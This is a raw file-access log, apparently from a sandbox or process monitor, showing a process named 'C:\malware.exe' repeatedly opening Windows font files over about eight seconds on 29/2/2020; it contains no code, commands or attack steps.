29/2/2020 - 1:46:25.200Open1480C:\malware.exeC:\Windows\Fonts\tahoma.ttf
29/2/2020 - 1:46:25.200Open1480C:\malware.exeC:\Windows\Fonts\tahoma.ttf
29/2/2020 - 1:46:25.200Open1480C:\malware.exeC:\Windows\Fonts\tahoma.ttf
29/2/2020 - 1:46:25.247Open1480C:\malware.exeC:\Windows\Fonts\tahoma.ttf
29/2/2020 - 1:46:25.247Open1480C:\malware.exeC:\Windows\Fonts\tahomabd.ttf
29/2/2020 - 1:46:25.247Open1480C:\malware.exeC:\Windows\Fonts\tahomabd.ttf
29/2/2020 - 1:46:25.247Open1480C:\malware.exeC:\Windows\Fonts\tahomabd.ttf
29/2/2020 - 1:46:25.293Open1480C:\malware.exeC:\Windows\Fonts\tahomabd.ttf
29/2/2020 - 1:46:25.387Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:25.387Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:25.387Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:25.387Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:25.387Open1480C:\malware.exeC:\Windows\Fonts\angsa.ttf
29/2/2020 - 1:46:25.387Open1480C:\malware.exeC:\Windows\Fonts\angsa.ttf
29/2/2020 - 1:46:25.387Open1480C:\malware.exeC:\Windows\Fonts\angsa.ttf
29/2/2020 - 1:46:25.481Open1480C:\malware.exeC:\Windows\Fonts\angsa.ttf
29/2/2020 - 1:46:25.481Open1480C:\malware.exeC:\Windows\Fonts\angsai.ttf
29/2/2020 - 1:46:25.481Open1480C:\malware.exeC:\Windows\Fonts\angsai.ttf
29/2/2020 - 1:46:25.481Open1480C:\malware.exeC:\Windows\Fonts\angsai.ttf
29/2/2020 - 1:46:25.575Open1480C:\malware.exeC:\Windows\Fonts\angsai.ttf
29/2/2020 - 1:46:25.575Open1480C:\malware.exeC:\Windows\Fonts\angsab.ttf
29/2/2020 - 1:46:25.575Open1480C:\malware.exeC:\Windows\Fonts\angsab.ttf
29/2/2020 - 1:46:25.575Open1480C:\malware.exeC:\Windows\Fonts\angsab.ttf
29/2/2020 - 1:46:25.668Open1480C:\malware.exeC:\Windows\Fonts\angsab.ttf
29/2/2020 - 1:46:25.668Open1480C:\malware.exeC:\Windows\Fonts\angsaz.ttf
29/2/2020 - 1:46:25.668Open1480C:\malware.exeC:\Windows\Fonts\angsaz.ttf
29/2/2020 - 1:46:25.668Open1480C:\malware.exeC:\Windows\Fonts\angsaz.ttf
29/2/2020 - 1:46:25.762Open1480C:\malware.exeC:\Windows\Fonts\angsaz.ttf
29/2/2020 - 1:46:25.762Open1480C:\malware.exeC:\Windows\Fonts\aparaj.ttf
29/2/2020 - 1:46:25.762Open1480C:\malware.exeC:\Windows\Fonts\aparaj.ttf
29/2/2020 - 1:46:25.762Open1480C:\malware.exeC:\Windows\Fonts\aparaj.ttf
29/2/2020 - 1:46:25.856Open1480C:\malware.exeC:\Windows\Fonts\aparaj.ttf
29/2/2020 - 1:46:25.856Open1480C:\malware.exeC:\Windows\Fonts\aparajb.ttf
29/2/2020 - 1:46:25.856Open1480C:\malware.exeC:\Windows\Fonts\aparajb.ttf
29/2/2020 - 1:46:25.856Open1480C:\malware.exeC:\Windows\Fonts\aparajb.ttf
29/2/2020 - 1:46:25.950Open1480C:\malware.exeC:\Windows\Fonts\aparajb.ttf
29/2/2020 - 1:46:25.950Open1480C:\malware.exeC:\Windows\Fonts\aparajbi.ttf
29/2/2020 - 1:46:25.950Open1480C:\malware.exeC:\Windows\Fonts\aparajbi.ttf
29/2/2020 - 1:46:25.950Open1480C:\malware.exeC:\Windows\Fonts\aparajbi.ttf
29/2/2020 - 1:46:26.43Open1480C:\malware.exeC:\Windows\Fonts\aparajbi.ttf
29/2/2020 - 1:46:26.43Open1480C:\malware.exeC:\Windows\Fonts\aparaji.ttf
29/2/2020 - 1:46:26.43Open1480C:\malware.exeC:\Windows\Fonts\aparaji.ttf
29/2/2020 - 1:46:26.43Open1480C:\malware.exeC:\Windows\Fonts\aparaji.ttf
29/2/2020 - 1:46:26.137Open1480C:\malware.exeC:\Windows\Fonts\aparaji.ttf
29/2/2020 - 1:46:26.137Open1480C:\malware.exeC:\Windows\Fonts\cordia.ttf
29/2/2020 - 1:46:26.137Open1480C:\malware.exeC:\Windows\Fonts\cordia.ttf
29/2/2020 - 1:46:26.137Open1480C:\malware.exeC:\Windows\Fonts\cordia.ttf
29/2/2020 - 1:46:26.231Open1480C:\malware.exeC:\Windows\Fonts\cordia.ttf
29/2/2020 - 1:46:26.231Open1480C:\malware.exeC:\Windows\Fonts\cordiai.ttf
29/2/2020 - 1:46:26.231Open1480C:\malware.exeC:\Windows\Fonts\cordiai.ttf
29/2/2020 - 1:46:26.231Open1480C:\malware.exeC:\Windows\Fonts\cordiai.ttf
29/2/2020 - 1:46:26.325Open1480C:\malware.exeC:\Windows\Fonts\cordiai.ttf
29/2/2020 - 1:46:26.325Open1480C:\malware.exeC:\Windows\Fonts\cordiab.ttf
29/2/2020 - 1:46:26.325Open1480C:\malware.exeC:\Windows\Fonts\cordiab.ttf
29/2/2020 - 1:46:26.325Open1480C:\malware.exeC:\Windows\Fonts\cordiab.ttf
29/2/2020 - 1:46:26.418Open1480C:\malware.exeC:\Windows\Fonts\cordiab.ttf
29/2/2020 - 1:46:26.418Open1480C:\malware.exeC:\Windows\Fonts\cordiaz.ttf
29/2/2020 - 1:46:26.418Open1480C:\malware.exeC:\Windows\Fonts\cordiaz.ttf
29/2/2020 - 1:46:26.418Open1480C:\malware.exeC:\Windows\Fonts\cordiaz.ttf
29/2/2020 - 1:46:26.512Open1480C:\malware.exeC:\Windows\Fonts\cordiaz.ttf
29/2/2020 - 1:46:26.512Open1480C:\malware.exeC:\Windows\Fonts\ebrima.ttf
29/2/2020 - 1:46:26.512Open1480C:\malware.exeC:\Windows\Fonts\ebrima.ttf
29/2/2020 - 1:46:26.512Open1480C:\malware.exeC:\Windows\Fonts\ebrima.ttf
29/2/2020 - 1:46:26.653Open1480C:\malware.exeC:\Windows\Fonts\ebrima.ttf
29/2/2020 - 1:46:26.700Open1480C:\malware.exeC:\Windows\Fonts\ebrimabd.ttf
29/2/2020 - 1:46:26.700Open1480C:\malware.exeC:\Windows\Fonts\ebrimabd.ttf
29/2/2020 - 1:46:26.700Open1480C:\malware.exeC:\Windows\Fonts\ebrimabd.ttf
29/2/2020 - 1:46:26.840Open1480C:\malware.exeC:\Windows\Fonts\ebrimabd.ttf
29/2/2020 - 1:46:26.887Open1480C:\malware.exeC:\Windows\Fonts\gisha.ttf
29/2/2020 - 1:46:26.887Open1480C:\malware.exeC:\Windows\Fonts\gisha.ttf
29/2/2020 - 1:46:26.887Open1480C:\malware.exeC:\Windows\Fonts\gisha.ttf
29/2/2020 - 1:46:26.981Open1480C:\malware.exeC:\Windows\Fonts\gisha.ttf
29/2/2020 - 1:46:26.981Open1480C:\malware.exeC:\Windows\Fonts\gishabd.ttf
29/2/2020 - 1:46:26.981Open1480C:\malware.exeC:\Windows\Fonts\gishabd.ttf
29/2/2020 - 1:46:26.981Open1480C:\malware.exeC:\Windows\Fonts\gishabd.ttf
29/2/2020 - 1:46:27.75Open1480C:\malware.exeC:\Windows\Fonts\gishabd.ttf
29/2/2020 - 1:46:27.75Open1480C:\malware.exeC:\Windows\Fonts\kokila.ttf
29/2/2020 - 1:46:27.75Open1480C:\malware.exeC:\Windows\Fonts\kokila.ttf
29/2/2020 - 1:46:27.75Open1480C:\malware.exeC:\Windows\Fonts\kokila.ttf
29/2/2020 - 1:46:27.168Open1480C:\malware.exeC:\Windows\Fonts\kokila.ttf
29/2/2020 - 1:46:27.168Open1480C:\malware.exeC:\Windows\Fonts\kokilab.ttf
29/2/2020 - 1:46:27.168Open1480C:\malware.exeC:\Windows\Fonts\kokilab.ttf
29/2/2020 - 1:46:27.168Open1480C:\malware.exeC:\Windows\Fonts\kokilab.ttf
29/2/2020 - 1:46:27.262Open1480C:\malware.exeC:\Windows\Fonts\kokilab.ttf
29/2/2020 - 1:46:27.262Open1480C:\malware.exeC:\Windows\Fonts\kokilabi.ttf
29/2/2020 - 1:46:27.262Open1480C:\malware.exeC:\Windows\Fonts\kokilabi.ttf
29/2/2020 - 1:46:27.262Open1480C:\malware.exeC:\Windows\Fonts\kokilabi.ttf
29/2/2020 - 1:46:27.356Open1480C:\malware.exeC:\Windows\Fonts\kokilabi.ttf
29/2/2020 - 1:46:27.356Open1480C:\malware.exeC:\Windows\Fonts\kokilai.ttf
29/2/2020 - 1:46:27.356Open1480C:\malware.exeC:\Windows\Fonts\kokilai.ttf
29/2/2020 - 1:46:27.356Open1480C:\malware.exeC:\Windows\Fonts\kokilai.ttf
29/2/2020 - 1:46:27.450Open1480C:\malware.exeC:\Windows\Fonts\kokilai.ttf
29/2/2020 - 1:46:27.450Open1480C:\malware.exeC:\Windows\Fonts\leelawad.ttf
29/2/2020 - 1:46:27.450Open1480C:\malware.exeC:\Windows\Fonts\leelawad.ttf
29/2/2020 - 1:46:27.450Open1480C:\malware.exeC:\Windows\Fonts\leelawad.ttf
29/2/2020 - 1:46:27.543Open1480C:\malware.exeC:\Windows\Fonts\leelawad.ttf
29/2/2020 - 1:46:27.543Open1480C:\malware.exeC:\Windows\Fonts\leelawdb.ttf
29/2/2020 - 1:46:27.543Open1480C:\malware.exeC:\Windows\Fonts\leelawdb.ttf
29/2/2020 - 1:46:27.543Open1480C:\malware.exeC:\Windows\Fonts\leelawdb.ttf
29/2/2020 - 1:46:27.637Open1480C:\malware.exeC:\Windows\Fonts\leelawdb.ttf
29/2/2020 - 1:46:27.637Open1480C:\malware.exeC:\Windows\Fonts\msuighur.ttf
29/2/2020 - 1:46:27.637Open1480C:\malware.exeC:\Windows\Fonts\msuighur.ttf
29/2/2020 - 1:46:27.637Open1480C:\malware.exeC:\Windows\Fonts\msuighur.ttf
29/2/2020 - 1:46:27.778Open1480C:\malware.exeC:\Windows\Fonts\msuighur.ttf
29/2/2020 - 1:46:27.825Open1480C:\malware.exeC:\Windows\Fonts\moolbor.ttf
29/2/2020 - 1:46:27.825Open1480C:\malware.exeC:\Windows\Fonts\moolbor.ttf
29/2/2020 - 1:46:27.825Open1480C:\malware.exeC:\Windows\Fonts\moolbor.ttf
29/2/2020 - 1:46:27.918Open1480C:\malware.exeC:\Windows\Fonts\moolbor.ttf
29/2/2020 - 1:46:27.918Open1480C:\malware.exeC:\Windows\Fonts\symbol.ttf
29/2/2020 - 1:46:27.918Open1480C:\malware.exeC:\Windows\Fonts\symbol.ttf
29/2/2020 - 1:46:27.918Open1480C:\malware.exeC:\Windows\Fonts\symbol.ttf
29/2/2020 - 1:46:27.918Open1480C:\malware.exeC:\Windows\Fonts\symbol.ttf
29/2/2020 - 1:46:27.918Open1480C:\malware.exeC:\Windows\Fonts\utsaah.ttf
29/2/2020 - 1:46:27.918Open1480C:\malware.exeC:\Windows\Fonts\utsaah.ttf
29/2/2020 - 1:46:27.918Open1480C:\malware.exeC:\Windows\Fonts\utsaah.ttf
29/2/2020 - 1:46:28.12Open1480C:\malware.exeC:\Windows\Fonts\utsaah.ttf
29/2/2020 - 1:46:28.12Open1480C:\malware.exeC:\Windows\Fonts\utsaahb.ttf
29/2/2020 - 1:46:28.12Open1480C:\malware.exeC:\Windows\Fonts\utsaahb.ttf
29/2/2020 - 1:46:28.12Open1480C:\malware.exeC:\Windows\Fonts\utsaahb.ttf
29/2/2020 - 1:46:28.106Open1480C:\malware.exeC:\Windows\Fonts\utsaahb.ttf
29/2/2020 - 1:46:28.106Open1480C:\malware.exeC:\Windows\Fonts\utsaahbi.ttf
29/2/2020 - 1:46:28.106Open1480C:\malware.exeC:\Windows\Fonts\utsaahbi.ttf
29/2/2020 - 1:46:28.106Open1480C:\malware.exeC:\Windows\Fonts\utsaahbi.ttf
29/2/2020 - 1:46:28.200Open1480C:\malware.exeC:\Windows\Fonts\utsaahbi.ttf
29/2/2020 - 1:46:28.200Open1480C:\malware.exeC:\Windows\Fonts\utsaahi.ttf
29/2/2020 - 1:46:28.200Open1480C:\malware.exeC:\Windows\Fonts\utsaahi.ttf
29/2/2020 - 1:46:28.200Open1480C:\malware.exeC:\Windows\Fonts\utsaahi.ttf
29/2/2020 - 1:46:28.293Open1480C:\malware.exeC:\Windows\Fonts\utsaahi.ttf
29/2/2020 - 1:46:28.293Open1480C:\malware.exeC:\Windows\Fonts\vijaya.ttf
29/2/2020 - 1:46:28.293Open1480C:\malware.exeC:\Windows\Fonts\vijaya.ttf
29/2/2020 - 1:46:28.293Open1480C:\malware.exeC:\Windows\Fonts\vijaya.ttf
29/2/2020 - 1:46:28.387Open1480C:\malware.exeC:\Windows\Fonts\vijaya.ttf
29/2/2020 - 1:46:28.387Open1480C:\malware.exeC:\Windows\Fonts\vijayab.ttf
29/2/2020 - 1:46:28.387Open1480C:\malware.exeC:\Windows\Fonts\vijayab.ttf
29/2/2020 - 1:46:28.387Open1480C:\malware.exeC:\Windows\Fonts\vijayab.ttf
29/2/2020 - 1:46:28.481Open1480C:\malware.exeC:\Windows\Fonts\vijayab.ttf
29/2/2020 - 1:46:28.481Open1480C:\malware.exeC:\Windows\Fonts\wingding.ttf
29/2/2020 - 1:46:28.481Open1480C:\malware.exeC:\Windows\Fonts\wingding.ttf
29/2/2020 - 1:46:28.481Open1480C:\malware.exeC:\Windows\Fonts\wingding.ttf
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\wingding.ttf
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\modern.fon
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\modern.fon
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\modern.fon
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\roman.fon
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\roman.fon
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\roman.fon
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\script.fon
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\script.fon
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\script.fon
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\andlso.ttf
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\andlso.ttf
29/2/2020 - 1:46:28.575Open1480C:\malware.exeC:\Windows\Fonts\andlso.ttf
29/2/2020 - 1:46:28.668Open1480C:\malware.exeC:\Windows\Fonts\andlso.ttf
29/2/2020 - 1:46:28.668Open1480C:\malware.exeC:\Windows\Fonts\arabtype.ttf
29/2/2020 - 1:46:28.668Open1480C:\malware.exeC:\Windows\Fonts\arabtype.ttf
29/2/2020 - 1:46:28.668Open1480C:\malware.exeC:\Windows\Fonts\arabtype.ttf
29/2/2020 - 1:46:28.809Open1480C:\malware.exeC:\Windows\Fonts\arabtype.ttf
29/2/2020 - 1:46:28.997Open1480C:\malware.exeC:\Windows\Fonts\simpo.ttf
29/2/2020 - 1:46:28.997Open1480C:\malware.exeC:\Windows\Fonts\simpo.ttf
29/2/2020 - 1:46:28.997Open1480C:\malware.exeC:\Windows\Fonts\simpo.ttf
29/2/2020 - 1:46:29.90Open1480C:\malware.exeC:\Windows\Fonts\simpo.ttf
29/2/2020 - 1:46:29.90Open1480C:\malware.exeC:\Windows\Fonts\simpbdo.ttf
29/2/2020 - 1:46:29.90Open1480C:\malware.exeC:\Windows\Fonts\simpbdo.ttf
29/2/2020 - 1:46:29.90Open1480C:\malware.exeC:\Windows\Fonts\simpbdo.ttf
29/2/2020 - 1:46:29.184Open1480C:\malware.exeC:\Windows\Fonts\simpbdo.ttf
29/2/2020 - 1:46:29.184Open1480C:\malware.exeC:\Windows\Fonts\simpfxo.ttf
29/2/2020 - 1:46:29.184Open1480C:\malware.exeC:\Windows\Fonts\simpfxo.ttf
29/2/2020 - 1:46:29.184Open1480C:\malware.exeC:\Windows\Fonts\simpfxo.ttf
29/2/2020 - 1:46:29.278Open1480C:\malware.exeC:\Windows\Fonts\simpfxo.ttf
29/2/2020 - 1:46:29.278Open1480C:\malware.exeC:\Windows\Fonts\majalla.ttf
29/2/2020 - 1:46:29.278Open1480C:\malware.exeC:\Windows\Fonts\majalla.ttf
29/2/2020 - 1:46:29.278Open1480C:\malware.exeC:\Windows\Fonts\majalla.ttf
29/2/2020 - 1:46:29.418Open1480C:\malware.exeC:\Windows\Fonts\majalla.ttf
29/2/2020 - 1:46:29.559Open1480C:\malware.exeC:\Windows\Fonts\majallab.ttf
29/2/2020 - 1:46:29.559Open1480C:\malware.exeC:\Windows\Fonts\majallab.ttf
29/2/2020 - 1:46:29.559Open1480C:\malware.exeC:\Windows\Fonts\majallab.ttf
29/2/2020 - 1:46:29.700Open1480C:\malware.exeC:\Windows\Fonts\majallab.ttf
29/2/2020 - 1:46:29.840Open1480C:\malware.exeC:\Windows\Fonts\trado.ttf
29/2/2020 - 1:46:29.840Open1480C:\malware.exeC:\Windows\Fonts\trado.ttf
29/2/2020 - 1:46:29.840Open1480C:\malware.exeC:\Windows\Fonts\trado.ttf
29/2/2020 - 1:46:29.934Open1480C:\malware.exeC:\Windows\Fonts\trado.ttf
29/2/2020 - 1:46:29.934Open1480C:\malware.exeC:\Windows\Fonts\tradbdo.ttf
29/2/2020 - 1:46:29.934Open1480C:\malware.exeC:\Windows\Fonts\tradbdo.ttf
29/2/2020 - 1:46:29.934Open1480C:\malware.exeC:\Windows\Fonts\tradbdo.ttf
29/2/2020 - 1:46:30.28Open1480C:\malware.exeC:\Windows\Fonts\tradbdo.ttf
29/2/2020 - 1:46:30.28Open1480C:\malware.exeC:\Windows\Fonts\ahronbd.ttf
29/2/2020 - 1:46:30.28Open1480C:\malware.exeC:\Windows\Fonts\ahronbd.ttf
29/2/2020 - 1:46:30.28Open1480C:\malware.exeC:\Windows\Fonts\ahronbd.ttf
29/2/2020 - 1:46:30.122Open1480C:\malware.exeC:\Windows\Fonts\ahronbd.ttf
29/2/2020 - 1:46:30.122Open1480C:\malware.exeC:\Windows\Fonts\david.ttf
29/2/2020 - 1:46:30.122Open1480C:\malware.exeC:\Windows\Fonts\david.ttf
29/2/2020 - 1:46:30.122Open1480C:\malware.exeC:\Windows\Fonts\david.ttf
29/2/2020 - 1:46:30.215Open1480C:\malware.exeC:\Windows\Fonts\david.ttf
29/2/2020 - 1:46:30.215Open1480C:\malware.exeC:\Windows\Fonts\davidbd.ttf
29/2/2020 - 1:46:30.215Open1480C:\malware.exeC:\Windows\Fonts\davidbd.ttf
29/2/2020 - 1:46:30.215Open1480C:\malware.exeC:\Windows\Fonts\davidbd.ttf
29/2/2020 - 1:46:30.309Open1480C:\malware.exeC:\Windows\Fonts\davidbd.ttf
29/2/2020 - 1:46:30.309Open1480C:\malware.exeC:\Windows\Fonts\frank.ttf
29/2/2020 - 1:46:30.309Open1480C:\malware.exeC:\Windows\Fonts\frank.ttf
29/2/2020 - 1:46:30.309Open1480C:\malware.exeC:\Windows\Fonts\frank.ttf
29/2/2020 - 1:46:30.403Open1480C:\malware.exeC:\Windows\Fonts\frank.ttf
29/2/2020 - 1:46:30.403Open1480C:\malware.exeC:\Windows\Fonts\lvnm.ttf
29/2/2020 - 1:46:30.403Open1480C:\malware.exeC:\Windows\Fonts\lvnm.ttf
29/2/2020 - 1:46:30.403Open1480C:\malware.exeC:\Windows\Fonts\lvnm.ttf
29/2/2020 - 1:46:30.497Open1480C:\malware.exeC:\Windows\Fonts\lvnm.ttf
29/2/2020 - 1:46:30.497Open1480C:\malware.exeC:\Windows\Fonts\lvnmbd.ttf
29/2/2020 - 1:46:30.497Open1480C:\malware.exeC:\Windows\Fonts\lvnmbd.ttf
29/2/2020 - 1:46:30.497Open1480C:\malware.exeC:\Windows\Fonts\lvnmbd.ttf
29/2/2020 - 1:46:30.590Open1480C:\malware.exeC:\Windows\Fonts\lvnmbd.ttf
29/2/2020 - 1:46:30.590Open1480C:\malware.exeC:\Windows\Fonts\mriam.ttf
29/2/2020 - 1:46:30.590Open1480C:\malware.exeC:\Windows\Fonts\mriam.ttf
29/2/2020 - 1:46:30.590Open1480C:\malware.exeC:\Windows\Fonts\mriam.ttf
29/2/2020 - 1:46:30.684Open1480C:\malware.exeC:\Windows\Fonts\mriam.ttf
29/2/2020 - 1:46:30.684Open1480C:\malware.exeC:\Windows\Fonts\mriamc.ttf
29/2/2020 - 1:46:30.684Open1480C:\malware.exeC:\Windows\Fonts\mriamc.ttf
29/2/2020 - 1:46:30.684Open1480C:\malware.exeC:\Windows\Fonts\mriamc.ttf
29/2/2020 - 1:46:30.778Open1480C:\malware.exeC:\Windows\Fonts\mriamc.ttf
29/2/2020 - 1:46:30.778Open1480C:\malware.exeC:\Windows\Fonts\nrkis.ttf
29/2/2020 - 1:46:30.778Open1480C:\malware.exeC:\Windows\Fonts\nrkis.ttf
29/2/2020 - 1:46:30.778Open1480C:\malware.exeC:\Windows\Fonts\nrkis.ttf
29/2/2020 - 1:46:30.872Open1480C:\malware.exeC:\Windows\Fonts\nrkis.ttf
29/2/2020 - 1:46:30.872Open1480C:\malware.exeC:\Windows\Fonts\rod.ttf
29/2/2020 - 1:46:30.872Open1480C:\malware.exeC:\Windows\Fonts\rod.ttf
29/2/2020 - 1:46:30.872Open1480C:\malware.exeC:\Windows\Fonts\rod.ttf
29/2/2020 - 1:46:30.965Open1480C:\malware.exeC:\Windows\Fonts\rod.ttf
29/2/2020 - 1:46:30.965Open1480C:\malware.exeC:\Windows\Fonts\simfang.ttf
29/2/2020 - 1:46:30.965Open1480C:\malware.exeC:\Windows\Fonts\simfang.ttf
29/2/2020 - 1:46:30.965Open1480C:\malware.exeC:\Windows\Fonts\simfang.ttf
29/2/2020 - 1:46:31.247Open1480C:\malware.exeC:\Windows\Fonts\simfang.ttf
29/2/2020 - 1:46:31.340Open1480C:\malware.exeC:\Windows\Fonts\simhei.ttf
29/2/2020 - 1:46:31.340Open1480C:\malware.exeC:\Windows\Fonts\simhei.ttf
29/2/2020 - 1:46:31.340Open1480C:\malware.exeC:\Windows\Fonts\simhei.ttf
29/2/2020 - 1:46:31.622Open1480C:\malware.exeC:\Windows\Fonts\simhei.ttf
29/2/2020 - 1:46:31.762Open1480C:\malware.exeC:\Windows\Fonts\simkai.ttf
29/2/2020 - 1:46:31.762Open1480C:\malware.exeC:\Windows\Fonts\simkai.ttf
29/2/2020 - 1:46:31.762Open1480C:\malware.exeC:\Windows\Fonts\simkai.ttf
29/2/2020 - 1:46:32.43Open1480C:\malware.exeC:\Windows\Fonts\simkai.ttf
29/2/2020 - 1:46:32.137Open1480C:\malware.exeC:\Windows\Fonts\angsau.ttf
29/2/2020 - 1:46:32.137Open1480C:\malware.exeC:\Windows\Fonts\angsau.ttf
29/2/2020 - 1:46:32.137Open1480C:\malware.exeC:\Windows\Fonts\angsau.ttf
29/2/2020 - 1:46:32.231Open1480C:\malware.exeC:\Windows\Fonts\angsau.ttf
29/2/2020 - 1:46:32.231Open1480C:\malware.exeC:\Windows\Fonts\angsaui.ttf
29/2/2020 - 1:46:32.231Open1480C:\malware.exeC:\Windows\Fonts\angsaui.ttf
29/2/2020 - 1:46:32.231Open1480C:\malware.exeC:\Windows\Fonts\angsaui.ttf
29/2/2020 - 1:46:32.325Open1480C:\malware.exeC:\Windows\Fonts\angsaui.ttf
29/2/2020 - 1:46:32.325Open1480C:\malware.exeC:\Windows\Fonts\angsaub.ttf
29/2/2020 - 1:46:32.325Open1480C:\malware.exeC:\Windows\Fonts\angsaub.ttf
29/2/2020 - 1:46:32.325Open1480C:\malware.exeC:\Windows\Fonts\angsaub.ttf
29/2/2020 - 1:46:32.418Open1480C:\malware.exeC:\Windows\Fonts\angsaub.ttf
29/2/2020 - 1:46:32.418Open1480C:\malware.exeC:\Windows\Fonts\angsauz.ttf
29/2/2020 - 1:46:32.418Open1480C:\malware.exeC:\Windows\Fonts\angsauz.ttf
29/2/2020 - 1:46:32.418Open1480C:\malware.exeC:\Windows\Fonts\angsauz.ttf
29/2/2020 - 1:46:32.512Open1480C:\malware.exeC:\Windows\Fonts\angsauz.ttf
29/2/2020 - 1:46:32.512Open1480C:\malware.exeC:\Windows\Fonts\browa.ttf
29/2/2020 - 1:46:32.512Open1480C:\malware.exeC:\Windows\Fonts\browa.ttf
29/2/2020 - 1:46:32.512Open1480C:\malware.exeC:\Windows\Fonts\browa.ttf
29/2/2020 - 1:46:32.606Open1480C:\malware.exeC:\Windows\Fonts\browa.ttf
29/2/2020 - 1:46:32.606Open1480C:\malware.exeC:\Windows\Fonts\browai.ttf
29/2/2020 - 1:46:32.606Open1480C:\malware.exeC:\Windows\Fonts\browai.ttf
29/2/2020 - 1:46:32.606Open1480C:\malware.exeC:\Windows\Fonts\browai.ttf
29/2/2020 - 1:46:32.700Open1480C:\malware.exeC:\Windows\Fonts\browai.ttf
29/2/2020 - 1:46:32.700Open1480C:\malware.exeC:\Windows\Fonts\browab.ttf
29/2/2020 - 1:46:32.700Open1480C:\malware.exeC:\Windows\Fonts\browab.ttf
29/2/2020 - 1:46:32.700Open1480C:\malware.exeC:\Windows\Fonts\browab.ttf
29/2/2020 - 1:46:32.793Open1480C:\malware.exeC:\Windows\Fonts\browab.ttf
29/2/2020 - 1:46:32.793Open1480C:\malware.exeC:\Windows\Fonts\browaz.ttf
29/2/2020 - 1:46:32.793Open1480C:\malware.exeC:\Windows\Fonts\browaz.ttf
29/2/2020 - 1:46:32.793Open1480C:\malware.exeC:\Windows\Fonts\browaz.ttf
29/2/2020 - 1:46:32.887Open1480C:\malware.exeC:\Windows\Fonts\browaz.ttf
29/2/2020 - 1:46:32.887Open1480C:\malware.exeC:\Windows\Fonts\browau.ttf
29/2/2020 - 1:46:32.887Open1480C:\malware.exeC:\Windows\Fonts\browau.ttf
29/2/2020 - 1:46:32.887Open1480C:\malware.exeC:\Windows\Fonts\browau.ttf
29/2/2020 - 1:46:32.981Open1480C:\malware.exeC:\Windows\Fonts\browau.ttf
29/2/2020 - 1:46:32.981Open1480C:\malware.exeC:\Windows\Fonts\browaui.ttf
29/2/2020 - 1:46:32.981Open1480C:\malware.exeC:\Windows\Fonts\browaui.ttf
29/2/2020 - 1:46:32.981Open1480C:\malware.exeC:\Windows\Fonts\browaui.ttf
29/2/2020 - 1:46:33.75Open1480C:\malware.exeC:\Windows\Fonts\browaui.ttf
29/2/2020 - 1:46:33.75Open1480C:\malware.exeC:\Windows\Fonts\browaub.ttf
29/2/2020 - 1:46:33.75Open1480C:\malware.exeC:\Windows\Fonts\browaub.ttf
29/2/2020 - 1:46:33.75Open1480C:\malware.exeC:\Windows\Fonts\browaub.ttf
29/2/2020 - 1:46:33.168Open1480C:\malware.exeC:\Windows\Fonts\browaub.ttf
29/2/2020 - 1:46:33.168Open1480C:\malware.exeC:\Windows\Fonts\browauz.ttf
29/2/2020 - 1:46:33.168Open1480C:\malware.exeC:\Windows\Fonts\browauz.ttf
29/2/2020 - 1:46:33.168Open1480C:\malware.exeC:\Windows\Fonts\browauz.ttf
29/2/2020 - 1:46:33.262Open1480C:\malware.exeC:\Windows\Fonts\browauz.ttf
29/2/2020 - 1:46:33.262Open1480C:\malware.exeC:\Windows\Fonts\cordiau.ttf
29/2/2020 - 1:46:33.262Open1480C:\malware.exeC:\Windows\Fonts\cordiau.ttf
29/2/2020 - 1:46:33.262Open1480C:\malware.exeC:\Windows\Fonts\cordiau.ttf
29/2/2020 - 1:46:33.356Open1480C:\malware.exeC:\Windows\Fonts\cordiau.ttf
29/2/2020 - 1:46:33.356Open1480C:\malware.exeC:\Windows\Fonts\cordiaub.ttf
29/2/2020 - 1:46:33.356Open1480C:\malware.exeC:\Windows\Fonts\cordiaub.ttf
29/2/2020 - 1:46:33.356Open1480C:\malware.exeC:\Windows\Fonts\cordiaub.ttf
29/2/2020 - 1:46:33.450Open1480C:\malware.exeC:\Windows\Fonts\cordiaub.ttf
29/2/2020 - 1:46:33.450Open1480C:\malware.exeC:\Windows\Fonts\cordiauz.ttf
29/2/2020 - 1:46:33.450Open1480C:\malware.exeC:\Windows\Fonts\cordiauz.ttf
29/2/2020 - 1:46:33.450Open1480C:\malware.exeC:\Windows\Fonts\cordiauz.ttf
29/2/2020 - 1:46:33.543Open1480C:\malware.exeC:\Windows\Fonts\cordiauz.ttf
29/2/2020 - 1:46:33.543Open1480C:\malware.exeC:\Windows\Fonts\cordiaui.ttf
29/2/2020 - 1:46:33.543Open1480C:\malware.exeC:\Windows\Fonts\cordiaui.ttf
29/2/2020 - 1:46:33.543Open1480C:\malware.exeC:\Windows\Fonts\cordiaui.ttf
29/2/2020 - 1:46:33.637Open1480C:\malware.exeC:\Windows\Fonts\cordiaui.ttf
29/2/2020 - 1:46:33.637Open1480C:\malware.exeC:\Windows\Fonts\upcdl.ttf
29/2/2020 - 1:46:33.637Open1480C:\malware.exeC:\Windows\Fonts\upcdl.ttf
29/2/2020 - 1:46:33.637Open1480C:\malware.exeC:\Windows\Fonts\upcdl.ttf
29/2/2020 - 1:46:33.731Open1480C:\malware.exeC:\Windows\Fonts\upcdl.ttf
29/2/2020 - 1:46:33.731Open1480C:\malware.exeC:\Windows\Fonts\upcdi.ttf
29/2/2020 - 1:46:33.731Open1480C:\malware.exeC:\Windows\Fonts\upcdi.ttf
29/2/2020 - 1:46:33.731Open1480C:\malware.exeC:\Windows\Fonts\upcdi.ttf
